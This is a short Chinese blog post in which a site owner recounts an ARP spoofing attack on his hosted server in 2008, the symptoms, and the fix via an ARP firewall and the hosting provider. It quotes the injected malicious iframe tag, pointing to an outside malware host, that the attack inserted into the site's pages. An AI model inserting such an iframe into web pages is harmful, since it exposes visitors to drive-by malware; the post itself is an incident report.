当前位置: 首页 > news >正文

亲历服务器ARP攻击处理办法

 

1.         攻击现象

516 1900左右,在下班回家的路上得到消息,公司的网站访问异常,异常情况如下

a)         IE7打开所有的网站html页面都变成了文件下载,无法正常打开网站
arp攻击后乱码
arp攻击后变成了乱码


b)         IE7改用不使用http1.1后,可以打开网站,但发现源文件头部被嵌入了1iframe

arp攻击后iFrame嵌入
Iframe内容为:<iframe src=http://xindizhi88.com/10.htm width=20 height=0 frameborder=0></iframe>

Google 百度过后发现是服务器收到了arp攻击

http://www.google.cn/search?sourceid=navclient&hl=zh-CN&ie=UTF-8&rlz=1T4GGLJ_zh-CNCN248CN249&q=%22xindizhi88%2ecom%22

http://www.baidu.com/s?wd=%22xindizhi88%2ecom%22&cl=3

2.         攻击解决办法

a)         arp防火墙软件

我这里是用了360安全卫士和360arp防火墙。效果还不错,访问正常了。此时已经1950.整整花了50分钟。也顺利找到了arp攻击源。
arp攻击拦截

b)         找到arp攻击源杀掉

由于是服务器托管,就把我这边发现的情况发给托管机房的技术人员。2100左右接到机房通知arp攻击源已经处理。上服务器发现确实正常了。

 

3.         参考资料

a)         一行代码暂时解决iframe挂马: http://www.foloda.com.cn/BLOG/article.asp?id=70

4.         arp攻击后的反思

a)         一般的服务器上到底是需要装什么样的安全软件?

                         i.              杀毒软件

                       ii.              ddos攻击软件

                      iii.              arp攻击软件

                      iv.              还有

大家多提提意见。

转载于:https://www.cnblogs.com/dreamstill/archive/2008/05/18/arpattack.html

相关文章:

  • docker 安装 Error response from daemon: Cannot start container no such file or directory
  • Ruby on rails开发从头来系列教程(附ruby电子书下载)
  • 测试计划模板
  • [转] Session简介
  • rocketmq 学习记录-2
  • 浅谈 Java 主流开源类库解析 XML
  • ASP.NET MVC - 旧形式URL的路由
  • v4l2 spec 中文 Ch01【转】
  • 在WinForm中使用Web Services 来实现 软件 自动升级(C#)
  • CISCO路由器license激活图解教程
  • [LeetCode] Wiggle Sort
  • ASP得到当前页面完整地址
  • Photoshop脚本 关闭所有已打开的文档
  • oop_day06_抽象类、接口_20150814
  • 电商直播ios app耗电发热比较评测
  • Angularjs之国际化
  • EOS是什么
  • interface和setter,getter
  • js ES6 求数组的交集,并集,还有差集
  • js继承的实现方法
  • Laravel 实践之路: 数据库迁移与数据填充
  • MySQL QA
  • oldjun 检测网站的经验
  • PHP那些事儿
  • Ruby 2.x 源代码分析:扩展 概述
  • TiDB 源码阅读系列文章(十)Chunk 和执行框架简介
  • vue脚手架vue-cli
  • 编写符合Python风格的对象
  • 技术胖1-4季视频复习— (看视频笔记)
  • 微信端页面使用-webkit-box和绝对定位时,元素上移的问题
  • 我是如何设计 Upload 上传组件的
  • 异步
  • 做一名精致的JavaScripter 01:JavaScript简介
  • ​人工智能书单(数学基础篇)
  • ​学习一下,什么是预包装食品?​
  • ​中南建设2022年半年报“韧”字当头,经营性现金流持续为正​
  • (007)XHTML文档之标题——h1~h6
  • (12)目标检测_SSD基于pytorch搭建代码
  • (附源码)ssm高校实验室 毕业设计 800008
  • (附源码)ssm户外用品商城 毕业设计 112346
  • (一)基于IDEA的JAVA基础10
  • (译)计算距离、方位和更多经纬度之间的点
  • (转)树状数组
  • .net Application的目录
  • .net core开源商城系统源码,支持可视化布局小程序
  • @serverendpoint注解_SpringBoot 使用WebSocket打造在线聊天室(基于注解)
  • [17]JAVAEE-HTTP协议
  • [20171102]视图v$session中process字段含义
  • [Android]Tool-Systrace
  • [BZOJ3223]文艺平衡树
  • [C#]C# OpenVINO部署yolov8图像分类模型
  • [codevs] 1029 遍历问题
  • [HOW TO]如何在iPhone应用程序中发送邮件
  • [html] 动态炫彩渐变背景
  • [Perl] Find Shell on your Wordpress site